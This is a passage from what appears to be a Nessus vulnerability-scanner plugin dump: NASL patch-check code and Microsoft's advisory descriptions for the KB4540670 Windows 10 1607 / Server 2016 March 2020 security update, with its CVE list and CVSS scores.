exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540681');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540681])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:28:49", "description": "The remote Windows host is missing security update 4540670.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791, CVE-2020-0898)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - A denial of service vulnerability exists when the Windows Tile Object Service improperly handles hard links. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0786)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540670: Windows 10 Version 1607 and Windows Server 2016 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0786", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897", "CVE-2020-0898"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540670.NASL", "href": "https://www.tenable.com/plugins/nessus/134369", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134369);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0786\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\",\n \"CVE-2020-0898\"\n );\n script_xref(name:\"MSKB\", value:\"4540670\");\n script_xref(name:\"MSFT\", value:\"MS20-4540670\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540670: Windows 10 Version 1607 and Windows Server 2016 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540670.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791, CVE-2020-0898)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - A denial of service vulnerability exists when the\n Windows Tile Object Service improperly handles hard\n links. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2020-0786)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles file\n operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. 